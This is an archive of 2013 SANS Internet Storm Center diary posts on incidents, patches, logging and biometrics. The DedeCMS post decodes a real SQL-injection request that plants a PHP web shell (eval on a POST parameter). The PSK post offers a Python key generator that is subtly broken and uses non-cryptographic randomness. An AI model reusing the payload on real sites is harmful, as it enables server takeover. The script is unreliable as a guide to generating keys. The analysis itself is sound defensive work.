Published: 2013-09-30

Twitter DM spam/malware

There has been a recent spat of Twitter accounts sending Direct Messages (DM) to others that are either spam or link to malware through shortened URLs. In some cases the accounts sending the DM may have been compromised through weak passwords, a malware infestation on the user's computer, or a third party application not playing nice. Rumours of Twitter having been hacked are also being passed around, I haven't seen any evidence either way. If you have been a victim of your Twitter account tweeting or sending DM without your approval let us know through our contact us page, or comments below. If you have a DM from someone that appears to be spam or has a suspicious link in it please do pass it along.

Let's be careful out there!

Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule


Published: 2013-09-28

Do you have your network perimeter secured against downloading malicious content?

Information security professionals take very seriously the network perimeter and tend to put in place several devices to enforce access control to network resources like firewalls, IPS, content filtering devices including antimalware functionality and network access control. But there are two specific variables that can increase a lot the risk of external compromises:

  • Administrative privileges in desktop computers: Many types of business software do not have implemented the principle of requiring the least privileges. That us why now a significant percentage of companies grant Administrator privileges to users, where their use is not monitored in detail.
  • USB device control: Many companies subject to compliance regulations does not allow usage of USB ports at all. However, those companies are a small percent of the total universe and the remaining ones are not willing to implement unpopular measures.

Consider the following scenario: companies with PC accessing through the official Internet access and corporate laptops with 4G access:

There are some circumstances where the CISO might be really unpopular, like the day where the official country's soccer team is playing a decisive match. Of course, the official internet access won't allow the access to the stream and so, people will find "alternate ways" to access it. Since not too many people knows the concept of default gateway and how to change it in the computer without causing themselves a self-inflicted denial of service, There is a very interesting program called delegate, which is a multipurpose proxy and will fit for the need of bypassing the internet access. Since there is a very detailed usage examples page, people can start using it without further difficulty.

Most people in corporate networks are aware that the "proxy parameter" exist, so it is very easy for them to change it and enjoy the "benefits" of free-of-restriction internet.

How can you tell if you have "free proxies" inside your network that use the illustrated scenario? nmap has a plugin that is able to check for open proxies. If you want to check for open proxies inside network, you can issue the command nmap --script http-open-proxy.nse The following figure shows an example result for the discussed scenario:


You should definitely segregate administrator privileges for your users and also disallow usage of 3G an 4G devices when plugged into the corporate network. If you don't have tools for this, you should monitor the usage for the administrator privileges given to your users.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail: msantand at isc dot sans dot org


Published: 2013-09-27

Tools for reviewing infected websites

At the ISC we had a report today from Greg about obfuscated Javascript on the site hxxp://fishieldcorp.com/.  A little research revealed that this site has been infected in the past. Nothing extraordinary, just another run of the mill website infection. 

What did strike me is how the nature of this research has changed  in recent years.  Not so long ago checking out a potentially infected website would have involved VMs or goat machines and a lot of patience and trial and error.  Today there are so many sites that will do the basics for you.  Greg sent us a link to URLQuery which displays a lot of information about a website including the fact that this one is infected.

I am increasingly become a fan of Sucuri for this type of research.  Like URLQuery Sucuri finds this website infected.

Sucuri also provides some other details that are interesting.  A dump of the Javascript code:

In this case what most intrigued me was the blocklist status of the website.

At the time of my review the infection was still being picked up by the various blocklist websites.  Between the time I took this screenshot and when I finished this diary, SiteAdvisor had picked it up and I will assume the others will follow close behind.

Definitely easier than in the past.  Now to find some time to work on that JavaScript.

Have any web based tools you like?  Please pass them on through comments to this diary!

Have a great weekend!

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Published: 2013-09-26

How do you monitor DNS?

Personally, my "DNS Monitoring System" is a bunch of croned shell scripts and nagios, in desperate need of an overhaul. While working on a nice (maybe soon published) script to do this, I was wondering: What is everybody else using?

The script is supposed to detect DNS outages and unauthorized changes to my domains. Here are some of the parameters I am monitoring now:

- changes to the zone's serial number
- changes to the NS records (using the TLD's name servers, not mine)
- changes to MX records
- monitoring a couple critical A and AAAA records (like 'www').

In addition, for zones with DNSSEC enabled:

- does the signature expire soon?
- do all key signing keys have valid DS records with the parent zone?
- did the DS record change?

What else are you monitoring?  What scripts / tools do you use to accomplish this?


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-09-24

IDS, NSM, and Log Management with Security Onion 12.04.3

This is a "guest diary" submitted by Doug Burks. We will gladly forward any responses or please use our comment/forum section to comment publicly.

I recently announced the new Security Onion 12.04.3:
What is Security Onion?
Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, Sguil, Squert, Snorby, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!
Can I see it in action?
The video and slides from my recent BSidesAugusta presentation are available:
I also just published a series of walkthrough videos as well:
How do I get it?
Download our ISO image (based on Xubuntu 12.04 64-bit) OR start with your preferred flavor of Ubuntu 12.04 (Ubuntu, Kubuntu, Lubuntu, Xubuntu, or Ubuntu Server) 32-bit or 64-bit, add our PPA and install our packages.  Please see our Installation guide for further details:
Lots o' Logs
If you connect Security Onion to a tap or span port, it will generate lots of logs out of the box:
- NIDS alerts from Snort or Suricata
- Bro conn.log (session data)
- Bro dns.log - all DNS transactions seen on your network
- Bro http.log - all HTTP transactions seen on your network
- Bro notice.log - events of interest
- Bro ssl.log - SSL cert details
- and many more!
In addition, you can install OSSEC agents on other boxes on your network and point them to the OSSEC Server that's already running on Security Onion.  You'll then get the raw logs from those OSSEC agents and you'll also get HIDS alerts as the OSSEC Server analyzes those logs.  For those devices that can't run an OSSEC agent, you can point their syslog to the syslog-ng collector on Security Onion.
How do we manage all those logs?
ELSA is a great tool for hunting through your logs.  Martin Holste, the author of ELSA, describes it like this:
"ELSA is a centralized syslog framework built on Syslog-NG, MySQL, and Sphinx full-text search. It provides a fully asynchronous web-based query interface that normalizes logs and makes searching billions of them for arbitrary strings as easy as searching the web."
Take a look at the following ELSA video to see how you can slice and dice your logs very quickly and easily:
Doug Burks
Want to learn more about Log Management?  Join me for SANS SEC434 Log Management In-Depth in Memphis TN on October 16th and 17th! 



Published: 2013-09-23

Am I using my Fingerprints yet?

I came across an article today that demonstrates a compromise of the new Apple 5S fingerprint reader:

In other words, a copy of your fingerprint is your fingerprint.  And as Johannes discussed in the first article on this (https://isc.sans.edu/forums/diary/In+Defense+of+Biometrics/16553/), the screen on your phone is one of the better fingerprint collectors out there !
For me, this brings up both sides of "the fingerprint discussion"

  • You can't change your fingerprints - once a real copy of them are compromised, they are compromised forever
  • A representation of your fingerprint is stored on the device.  So if the device is lost or stolen, this representation could be used to compromise other things, if they use the same representation of your fingerprint (ie - any other device that uses the same manufacturer's hardware).  Again, once stolen, they are stolen forever.
  • After a couple of years, you'll likely trade your phone in for a new one, and today there isn't a way to know that a wipe of the phone wipes the saved representation of your fingerprint
  • Your fingerprint may be backed up with your phone backup.  Historically, your phone's backups have been easier to pillage than your phone.
  • If your phone is damaged, you may not have a way of wiping it

On the other hand:

  • On any given day, using your fingerprint is likely MUCH more secure for you than the 4 digit code you are likely using
  • Since your phone code likely matches either your phone number or your bank code, either it's very easy to guess, or compromising it might have other unpleasent consequences for you.

There's lots of discussion on this online, I think we're still waiting on Apple to respond definitively on any of them.

Anyway, none of these arguments are new, we've been round and round on them anytime these last 10 years, since they started putting readers on laptops for login.  What's changed is that there are way more phones than there are laptops, and in most cases the 4 digit unlock code on your phone is all that protects your chequing account, your facebook, paypal, twitter and email accounts.

So, am I using my fingerprints yet?  Not on any of my laptops, but once I upgrade my 4S to the new model, it'll be awfully tempting to take the plunge - I guess I'm still thinking about it.  If Apple would implement a "fingerprint + PIN" two factor authentication solution, it'd be an easier decision.

We welcome your comments in our discussion forum (comment button below).

Rob VandenBrink


Published: 2013-09-23

How do you spell "PSK"?

In my line of work, there is a lot of uses for a random sting of text.  Things like:

  • VPN Preshared Keys
  • RADIUS or TACACS  "shared secrets"
  • Windows Service Account Passwords
  • Administrative accounts (Windows local or domain Administrator, in some cases root in *nix)

You get the picture.  Strings that you need to key once, or once per instance.  In most cases, these are strings that after creation, you don't neccesarily need to know what they are, you just need to know how to change them.

With this list of parameters, you'd think that folks would use random characters for these functions right - at least do the random keyboard walk for it?  In my experience, this is almost NEVER the case.  People try spell things - "l3tm31n", D0ntg0th3r3" and the like.  They'll use their Company name, or the street address of their organization, or some other "meaningful" string.  And after using "leet-speak" passwords, they then carefully record the password and save it to a text file, usually on the server that's using the password.  As a pentester, this is a win for me, I don't even need to crack the password, you just gave it away!  As a system administrator, this horrifies me!

So, what to do?  In the past, I've used an excel spreadsheet to generate a random string of "n" characters, selected from a set of characters that do not include the "confusing" ones (Oo01lIiL and so on).   The "randomness" was defined by how long I felt like leaning on the F9 key that day.  After creating the string, I would then try to get my client to NOT write down the string - this almost never works, but it's worth a try.

For today's story, I decided to improve on this a bit, and re-coded it in python.  This was a 5 minute script (as most of mine are), so if you see a way to improve or neaten this up in any way, please - don't be shy - use our comment form.

========================================= psk.py =========================================

from random import randint
import sys
if not (len(sys.argv) == 2):                                           # verify syntax
        print "Syntax PSK LENGTH_OF_PSK"


rndstrlen = int(sys.argv[1])                                           # how long is the output string?

chars = "abcedfghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ23456789"       # define the list of valid characters
charlist = list(chars)                                                 # change it to a list for lookups

numchars = len(charlist)  -1                                           # get length of string list, -1 for start from zero

for i in range (0, rndstrlen):
     c = charlist[randint(0,numchars)]                                 # pick a random char from the list
     outstring += c                                                    # append it to outstring

print outstring


Running this as "python psk 15" will create a 15 character pseudo-random string:

C:\> python psk.py 15

C:\> python psk.py 15

C:\> python psk.py 15

C:\> python psk.py 15

C:\> python psk.py 15

You can change the values that are permitted to be in the string (to exclude lower case values, or to add special characters) by adding or removing characters in the "chars" string.  Changing the length of the string is as simple as changing the  value in the command line option:

C:> python psk.py 32

C:> python psk.py 64

And please, in most cases there is NO reason to write down this password.  Your "windows service password for whichever service" for instance should be changed periodically, but in most cases there is no reason that you should know what it is, you just need to be able to change it. 

Also, if you use this to create a random pre-shared-key for your ste-to-site VPN, emailing it in cleartext is what we call "a bad idea".  Not only is it open for theft as it transits the internet (and both internal networks), it's also stored (likely forever) in your sent mail and in the recipients inbox, and likely in the Exchange Server message store - the whole cleartext data at rest / cleartext data in transit concept should ring a bell, especially if you've been audited for PCI lately.

As always, in these days when brute-forcing is simple, quick and cheap, bigger is in fact better.  For pre-shared keys or "write only" passwords, I generally start at 32 characters and go up from there.  Since you never need to re-key the thing, after it's generated you can cut/paste it and forget it.

I hope that you find this simple bit of code useful.  If you've got a simpler way of getting to the same results, or if you can improve on my quick-and-dirty python, please post to the comment field below!

Rob VandenBrink


Published: 2013-09-20

Threat Level Yellow: Protection recommendations regarding Internet Explorer exploits in the wild

The Internet Storm Center is beginning to see increased evidence of exploits in the wild regarding Microsoft Security Advisory 2887505.  Accordingly, we're moving the InfoCon up to Yellow.

Per the advisory:
Microsoft is investigating public reports of a vulnerability in all supported versions of Internet Explorer. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability in Internet Explorer 8 and Internet Explorer 9. Applying the Microsoft Fix it solution, CVE-2013-3893 Fix It Workaround, prevents the exploitation of this issue. This FixIt solution also includes EMET 4.0 guidance. Certainly consider use of EMET 4.0 where you can.  Please note, the Fix It seems to only help 32-bit versions of browsers. That said the vulnerability affects all versions of Internet Explorer except in instances of Windows Server 2008 and 2012 Core installations.
It appears that an exploit has been in the wild since August 29th, 2013 when it was first seen by one of the online security scanners.  There is some indication that a weaponized exploit may be in broader circulation now, so expect this to ramp up quickly.
Emerging Threats does have Snort signatures available for this issue: http://www.emergingthreats.net/2013/09/19/daily-ruleset-update-summary-09192013/. Expect Rapid 7 to likely release Metasploit bits in the near term. We'll update here as we see more on this vulnerability emerge.


Published: 2013-09-19

Arrays in requests, PHP and DedeCMS

We received an interesting submission about a strange looking Apache web server log. While the log does not look malicious, after examining it carefully it certainly looks strange, as you can see below: - - [05/Sep/2013:06:02:49 +0800] "GET /plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109 [snip] HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

The log, as shown below, contains a request to the download.php PHP script with a bunch of parameters that appear to be the same. After decoding %5B and %5D to [ and ], the request becomes a bit more obvious:


The request above contains repeating arrs1[] parameters – PHP treats these as members of an array so this actually creates an array called arrs1 (and later arrs2 as shown in the original log) which contains various numbers. These numbers (99, 102, 103 …) look like ASCII encodings, so the next step to decode this is to push it through a perl one liner that will work on the original log:

$ perl -pe 's/(&arrs(1|2)%5B%5D=)(\d+)/chr($3)/ge' < original.log - - [05/Sep/2013:06:02:49 +0800] "GET /plus/download.php?open=1cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'` HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

And this definitely looks malicious. After a bit of research, it turned out that this is an attack against a known vulnerability in the DedeCMS, a CMS written in PHP that appears to be popular in Asia. This CMS has a pretty nasty SQL injection vulnerability that can be exploited with the request shown above.

The vulnerability exists because the CMS uses the $GLOBALS global variable which is then further propagated to an SQL query. The resulting query, from the decoded attack above, is pretty obvious: the attacker will create a file called 90sec.php which is a very simple backdoor PHP shell that allows the attacker to execute any command with a POST HTTP request that contains the command to be executed in the parameter called guige (highlighted above).

While in this case this was simply a way to transfer an array over a GET request, similar request can also abuse HTTP Parameter Pollution attacks, where a single parameter is added multiple times into GET or POST requests, resulting in potentially unexpected behavior.

Additionally, as you can see in the log at the top, the User Agent string has been set to WinHttp.WinHttpRequest, which indicates that this request was created by a script or an attack tool executed on a Windows machine.

Thanks to our reader for sending the logs, and for being alert about strange looking requests – something everyone should do.



Published: 2013-09-18

More Goodies in the Apple Security Update Basket!

An OSX update that fixes a situation where the hostname in a certificate is not checked against the actual hostname.  This vulnerability means that anyone with a valid certificate can impersonate any host - lots of attack applications in this, when combined with MITM or DNS hijack attacks

An absolute TON of updates for IOS, which should be no surprise in a new version.  The highlights include updates to the Root Certificates, fixes for code exploit issues from malicious PDF and Movie files, and a bypass for the password retry limit, allowing a malicious app to brute force the device unlock code.
Also some fun fixes for several cross site scripting issues within Webkit (which is the provider for browser functions in IOS)

Attack vectors for these include buffer overflows, misses on bounds checking and some fun kernel mode attacks!

As always, watch for the full details on Apple's Security Update Page, found here ==> http://support.apple.com/kb/HT1222

Rob VandenBrink


Published: 2013-09-18

Apple DDOS? Nope, just the update coming down!

The amount of press that Apples IOS 7 update has gotten today has had an unintended consequence - everyone seems to be pulling it down the instant they see that it's available.

This is triggering IPS Sensors and causing real DOS conditions due to the traffic involved - an unintended "apple - zooka"

Swa, one of our handlers, indicates that this can be easily resolved for a single broadcast domain by enabling the Apple Caching Service on a single OSX Server in the network.  Clients find it with Bonjour, and a single download services all clients. (thanks for the screenshot Swa)

I'm not sure how this interacts with the Service Discovery features in mDNS - if anyone has details on this we'd appreciate your insight in the comments field for this story!

Generally, just enabling this is enough, but advanced settings for the caching server can be found here ==> http://support.apple.com/kb/HT5590


Rob VandenBrink


Published: 2013-09-18

Cisco DCNM Update Released

We continue to see web applications deployed to manage datacenter functions.  And I'm sorry to say, we continue to see security issues in these applications - some of them so simple a quick run-through with Burp or ZAP would red-flag them.

In that theme, today Cisco posts updates to DCNM (Cisco Prime Data Center Network Manager).  The issues resolved are not so simple as I describe above (they are more complex than a simple scan to detect or exploit), but they do involve remote command execution and authentication bypass - two things most folks should have problems with in a Data Center Network Manager.

The advisory is here ==> http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm

As per usual, a valid service contract is required to obtain the update.  My clients do have Cisco contracts, but I'm not sure how thrilled I am that you need to pay maintenance to fix security issues so fundamental.

Rob VandenBrink


Published: 2013-09-18

Apple IOS 7 - Brace for Impact!

Apple IOS 7 is available today (just posted in fact). While the major push for this is support for the new iPhone platforms, we can expect functional and security changes that will affect all ios platforms, among them:

  • per app licensing
  • per app vpn settings
  • per app encryption keys
  • single signon (What could possibly go wrong with this?! )
  • and better MDM (Mobile Device Management) functions - expect upgrades for your corporate MDM platforms sometime real soon, and expect that management will want these applied ASAP!
  • More on these features here - http://www.apple.com/ios/business/

 I'm sure several of these new features are worth a story all on their own - stay tuned!

We've all seen the flurry of app updates over the past few weeks, as everyone gets their app ready for the new OS. Before updating, you should check to see that all of your apps will support the new operating system. For instance, I still use Stanza as a reader app for my fiction library. Since it was officially moved to unsupported status by Amazon, I think it's smart for me to (finally) change readers before I upgrade.

This update comes at an interesting time for a couple of my clients. Since going to a BYOD model, they now have thousands of i-devices ontheir networks, unmanaged and for the mostly owned by their users (or their visitors). Ibn most organizations, at just under 1GB the bandwidth overhead of for this update shouldn't be an issue, but one client in my list is in that "thousands of Apple devices" list and is also on my "bandwidth constrained" list. I can see this update affecting their business applications, both by stressing their already maxed out WAN and also by adding to their already over-capacity internet uplink. We're changing their QOS to de-prioritize "all things Apple" for today. Once we can characterize what this update looks like on the network, we'll make the ACL more specific to just deprioritize the update traffic.  Now that the update is posted, I'll be firing up TCPDUMP and doing just that !

Rob VandenBrink


Published: 2013-09-17

Microsoft Releases Out-of-Band Advisory for all Versions of Internet Explorer

Microsoft just released an advisory on an Internet Explorer vulnerability that would allow for remote execution.  The report references public availability of details of his vulnerability.  The long story short, a targetted attack that gets a user to view a malicious webpage (or malicious content on an otherwise safe webpage) could lead to memory corruption that could execute arbitrary code with the permissions of the logged in user.  Two suggested actions are provided by Microsoft, apply the FixIt provided by Microsoft or deploy EMET 3.0/4.0 which provides generalized protection of memory (and probably not a bad idea to deploy anyway).  Note, the FixIt ONLY applies to 32-bit versions of Internet Explorer.

This post will be updated with more details as the situation warrants.

John Bambenek
bambenek \at\ gmail /dot/ com
Bambenek Consulting


Published: 2013-09-17

A Random Diary

The current discussion about breaking encryption algorithm has one common thread: random number generators. No matter the encryption algorithm, if your encryption keys are not random, the algorithm can be brute forced much easier then theoretically predicted based on the strength of the algorithm. All encryption algorithms depend on good random keys and generating good random numbers has long been a problem.

In Unix systems for example, you will have two random devices: /dev/random and /dev/urandom. "random" usually produces random numbers based on some source of entropy. In Linux, parameters like mouse movements, disk activity and interrupts are used. Older versions of the random number generator used network activity, but since the attacker may be able to affect network activity, this parameter is no longer used. The Linux random number generator was found to be not particularly well implemented, in particular on disk less systems and systems with little user activity, like for example routers [1] .

Recently, some implementations of Linux like OpenWRT where found vulnerable if they are used on MIPS based hardware. The random number generator on these systems uses the number of CPU cycles since reboot as a seed. However, the respective function always returns 0, not the actual number of cycles on MIPS. [2]

Are there better ways to collect random numbers? One of the challenges is to increase the amount of entropy (random events) collected. There are some good attempts to use microphones, cameras and other hard ware devices to improve the pool of entropy. Sadly, there are no simple "standardized" solutions to implement these techniques.

Here are a couple pointers to projects that may help you implement better random number generators:

Using the camera in Windows : http://wcrnd.sourceforge.net
using the sound card in Windows: http://sourceforge.net/projects/trng
Linux camera based random number generator: http://sourceforge.net/projects/lavarnd/
Linux sound card random source: http://code.google.com/p/snd-egd/

testing random number generators: http://www.leidinger.net/FreeBSD/dox/dev_rndtest/html/df/d2a/rndtest_8c_source.html (look for "rndtest" in your Linux distro)

Got any other tips to create good random numbers (cheaply)?

[1] http://www.pinkas.net/PAPERS/gpr06.pdf
[2] https://lists.openwrt.org/pipermail/openwrt-devel/2013-September/021318.html

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-09-16

Microsoft re-releases patches that were causing an install loop

Last week a number of people reported that there were three patches that continuously installed. Microsoft has re-released these patches after fixing the detection issue that was causing the problem.  
The following were re-issued: 
    • Security Update for Microsoft Office SharePoint Server 2007 (KB2760589)
    • Security Update for Microsoft Office 2007 suites (KB2760411)
    • Security Update for Microsoft Office 2010 (KB2767913)
    • Security Update for Excel 2003 (KB2810048)
    • Security Update for Microsoft Office Excel 2007 (KB2760583)
    • Security Update for Microsoft Office Excel Viewer 2007 (KB2760590)
    • Security Update for Microsoft Office 2007 suites (KB2760588)
    • Security Update for Microsoft Office 2013 (KB2810009) 64-Bit Edition
  •  Non-Security Updates:
    • Update for Microsoft PowerPoint 2010 (KB2553145)
    • Update for Microsoft PowerPoint Viewer 2010 (KB2553351)

If the initial patch worked for you there is no need to do anything.  If your machines went into a install loop for the patch it should now be fixed and you can test and deploy. 



Published: 2013-09-13

Java and Old Hash Algorithms

David, one of our readers, emailed wih a question - when he tries to interact with a particular print driver, he gets a Java error:

PKIX path validation failed:
Algorithm constraints check failed: MD2withRSA

This error comes up because as of Java 7, MD2 hashing and any RSA hash under 1024 bits are disabled.  Since this is a (very) old printer driver, the fact that it still uses MD2 is not a surprise - but what to do next?

OK - the obvious answer is to upgrade out of the problem - if the driver has an update, apply it.  But how do we get to the interface given the Java situation?  The answer is buried in the Java config files - - edit the file java.securty, which in Windows is found at: "C:\Program Files (x86)\Java\jre7\lib\security"

In this file, you'll find the line:

jdk.certpath.disabledAlgorithms=MD2, RSA keySize < 1024

Edit or comment out this line, and MD2 will work for you again. But don't leave it like this - this enables all those certs with weak hashes, which leaves you open to a world of hurt.  In this case, it gets you access back to the interface so you can upgrade to a newer version.  If there is no newer version, it gives you access until you can upgrade the hardware or app that's causing the problem.

Rob VandenBrink


Published: 2013-09-13

Happy Friday the 13th !

My, how things have changed since 1987 – especially in the world malware!  In that year, the Jerusalem Virus hooked the old DOS Interrupts (int 21h for those who did assembler back in the day) for operation.  Since everything else also used INT 21h, including Netware clients (remember Netware?) and most DOS services, this malware slammed the already slow computers of the day with an additional performance hit.  Once on your system, this one infected all exe’s on the drive, growing them all by a specific number of bytes (depending on the variant).  On Friday the 13th, it then deleted all the EXE’s on the infected system.

If you’re interested, there’s more on this oldie here: http://en.wikipedia.org/wiki/Jerusalem_%28computer_virus%29.  I’d guess that the AV folks all have a page on this one as well.

In today's terms,  there is no point to this “vintage virus”, aside from infecting as many computers and as many executables as possible, then doing the mass-destruction thing when the countdown expires.  Mainly it’s a “because I can” piece of destructive code.

These days, most attacks and malware is all about theft of dollars, credentials or information of some kind.  It’s become a business like any other, and like other businesses “follow the money” is the best way of determining motivation and what’s happening behind any smokescreen involved.  Often we have to follow the packets, or the log entries, or the code along the way, but the end goal and motivation is most often financial.  It’s protecting this target information that keeps us all awake at nights, and drives the entire security effort that we’re all a part of.

Anyway, if you still have a DOS or Windows/9x system (sadly, I’ve still got a client running a pharmaceutical manufacturing system on Win9x), today might be a bad day for you.  But if not, take a minute to think about what we’re protecting, and (as always) what you may have missed.  

Speaking of oldies but goodies, and things missed - it might be a good day to look ahead and deal with a few loose ends in today’s infrastructure:

  • think about knocking that last Win2K server out of your infrastructure - moving it to a VM did NOT solve this issue forever
  • Or deal with that ticking time-bomb of the XP stations still left in the infrastructure.  Microsoft recently posted an article on the risks of running XP past April 8,2014 (less than 7 months away !! )  http://blogs.technet.com/b/security/archive/2013/08/15/the-risk-of-running-windows-xp-after-support-ends.aspx.  If you think XP has been a bit quiet on the security front lately, consider that this is likely because the bad guys are saving all their zero days up for April 9 of next year.  I know of a few large organizations (>5,000 stations) that have put this off long enough that getting this project planned and done in time might not be possible.  If you are still running XP on April 9, you may end up having to explain to shareholders why your business was partially or mostly offline for the last 10 weeks of Q2 2014 !!

If money is the motivation for many of today's attacks and malware, XP and Win2K are the unlocked doors in the neighborhood - it's time and past time to get these things battened down!

Rob VandenBrink


Published: 2013-09-12 / /, anyone?

It started with a pretty benign question from an ISC reader. But if the corresponding SQL query times out on our sensors, something is probably indeed going on ... The IP addresses listed above have >30'000 domain names associated to them, all of the format as shown below

byqajg2lclo7221tdx511xf21594e06d2bb1166c296c16adf1cbfe1b [ dot ] bizgo.be
byqajg2lclo7221tdx511xf21594e06d2d442d2a296c5ee5188fa2c0 [ dot ] bizgo.be
byqajg2lclo7221tdx511xf21594e06d2df74c3c296c49dd3801615d [ dot ] bizgo.be
byqajg2lclo7221tdx511xf40934e06d2ce119772967b2379df2211a [ dot ] bizgo.be

bizgo is not the only domain used, there are many, but currently concentrated in *.be. The host names seem to be time-based, and are only valid for the briefest of instants. This makes manual analysis somewhat difficult - by the time you have grabbed a sample and are running it in the sandbox, well, the domain name no longer resolves. Consequently, only a handful of malware reports on VirusTotal and Malwr.com so far actually show a real detection, for example


and both suggest that a Trojan Downloader is coming from this IP, but otherwise didn't get all that far with the analysis. For the traffic that a sensor of ours captured, the requested file path was /i/last/index.php, which matches Emerging Threat SID 2015475 for a Blackhole landing page.

If you have intel to share on these domains or IPs, please let us know via the contact form, or the comments below.



Published: 2013-09-11

Reboot Wednesday: Yesterday's Patch Tuesday Aftermath

We have a couple of issues people reported with yesterday's Microsoft patches. Let us know if you experienced any of these issues, and what workaround you applied to get things back to normal:

KB2868116: Takes very long to install. Just sit back and wait (30-45 Minutes). This patch improves the content of warning messages, so it is somewhat security relevant, but does not patch an actual vulnerability.

KB2817630: Causes Outlook to loose all folders. No workaround other then removing the patch. This was not a security patch.

We will add to this list as we confirm any other issues. So far, there are some reports of the system re-applying the same patch over and over, but there are just one or two users reporting this, and in some cases the patch that causes it isn't identified.



Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-09-11

In Defense of Biometrics

There is a new iPhone and it comes with a finger print sensor! What better reason to talk a bit about biometric. In the good old days before Defcon and Wardriving, Biometrics had an ambiance of "high security". Remember the James Bond movie where they cut out a guy's eye to bypass a retina scanner? Those days are long gone. Now we have seen fingerprint and facial recognition systems being bypassed by simple printouts of the fingerprint or face, or rubber molds of fingerprints being used instead of the real thing.

So how meaningful is a fingerprint sensor these days? The right answer is of course: It depends. First on the quality of the sensor, secondly of the software used to analyze the acquired data, and finally the alternative authentication methods it replaces or suplements.

During enrollment, the sensor acquires a reference image of the fingerprint. This image is then analyzed, and certain parameters are extracted from the image. It is these parameters, not the original image, that will be used to compare later authentication attempts. Of course, no two images are quite alike. It may not be possible to identify all the parameters, or some additional characteristics may be discovered that were not visible in the reference scan. The result is that the software has to allow for some variability. For low quality sensors, this variability can be quite large, leaving you with only few distinct features. The result is the same as having a bad password: Many different users will end up with the same "fingerprint" as far as the sensor is concerned.

So what does this mean for the iPhone, or mobile device authentication in general? The problem with mobile device authentication has always been the fact that it is difficult for the user to enter complex passwords on a small keyboard. The result is that most users choose short numeric PINs. There have been a couple of other attempts, for example the Android "pattern" login and the use of cameras for facial recognition. The facial recognition usually suffers from bad sensor quality and from very variable lighting. The pattern login is a pretty neat idea, but I think it hasn't been tested sufficiently to figure out how much patterns users choose actually differ.

There is one thing Apple appears to have done right: The fingerprint data stays on the phone, and is not backed up to any cloud service. If this information got lost, an attacker could use it to reconstruct a duplicate of the finger, which in turn could be used for biometric identification even beyond the iPhone itself. 

As far as the quality of the image sensor and software: We will have to wait for it to be tested once the phone is released. It probably does not include more advanced feat rues like measuring the users body temperature or observing blood flow. But I hope it will be better then a 4 digit pin.

One easy improvement: Make it "real two factor" by allowing users to require a PIN/Password in addition to the fingerprint. Could they have done better then a fingerprint? There are a few different common biometric sensors: Facial recognition, Fingerprint, Weight/Height, retina scans and iris scans. Fingerprints are probably best considering the price of the sensor and the difficulty to acquire the data.

Finally: There is probably one real big vulnerability here. A stolen iPhone is likely covered in the user's fingerprints. It shouldn't be too hard for an attacker to lift a finger print off the phone itself to bypass the sensor.


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-09-11

Getting Started with Rsyslog Filters


This is a "guest diary" submitted by Tom Webb. We will gladly forward any responses or please use our comment/forum section to comment publically. Tom is currently enrolled in the SANS Masters Program.

Rsyslog has some very useful features when building a centralized syslog system. If you are not currently centralizing your logs or have not organized them in an efferent way for analysis, this post will get you started in the right direction.  

To understand how to create a filter, you must understand the basic breakdown of the message format. Below is a visual representation of a basic log. The rawmsg is the entire syslog line. If you use this in your filter, it will check the entire line for a match. The hostname field can match a name or an IP address. The programname field normally lists the application that created the log and the msg field is anything after the programname. 



Aug 14 02:38:01  SIFT-Workstation  rsyslogd:      rsyslogd's userid changed to 101


Client logs

To setup all logs for a Linux system to forward to your central log server simply change the /etc/rsyslog.conf file and replace the IP address of your syslog server with ( in following line:

*.* @

If you only want to forward a type of application logs to syslog, be more specific about what you want to send. If you do not need all the information in a log, filter out the noise. This will save disk space and speed up processing. In this example, we are only sending apache logs to the server. 

If $programname contains ‘apache’ then @

To send the logs via UDP use one ‘@’ sign and to send the logs via TCP use two ‘@@’ signs.

If $progrmname contains ‘apache’ then @@

Organizing Logs

Once you have several devices reporting to your syslog server, you will need to break the logs into different files to make analysis easier. Most often, you will want to group logs by application. Some of the common operators for filtering are contains, isequal, and startswith.

If you want rsyslog to stop process the line once you have a match, use & ~ on the next line. This prevents the line from being entered into multiple files (e.g. /var/log/my-log and /var/log/syslog).

To place all logs from one IP address into a single log, use the below example. It takes anything from the IP and adds it to the /var/log/mail.log. 

if $fromhost-ip == '' then /var/log/mail.log


For devices in a cluster, you will likely want both device logs in the same file. In the following example both IP and logs are placed into the /var/log/firewall.log. 

if ($fromhost-ip == '' or  $fromhost-ip == '') 

Use a partial IP match for lots of devices on a couple of subnets. In this example, anything that has a 10.20.0 address or 10.30.0 is placed into /var/log/load-balance.log. Rsyslog cannot use CIDR notation for subnets, but in most cases, this is a decent replacement.

if ($hostname contains '10.20.0' or $hostname contains '10.30.0') then/var/log/load.log

To create a log for all authentications, the rule below will take any message that contains ‘auth’ and place it into the /var/log/remote-auth.log file.

if $msg contains 'auth' then /var/log/remote-auth.log

A more complex filter to match both authentications and the word fail, use the below example.

If $msg contains ‘auth’ and $msg contains ‘fail’ then /var/log/remote-fail.log

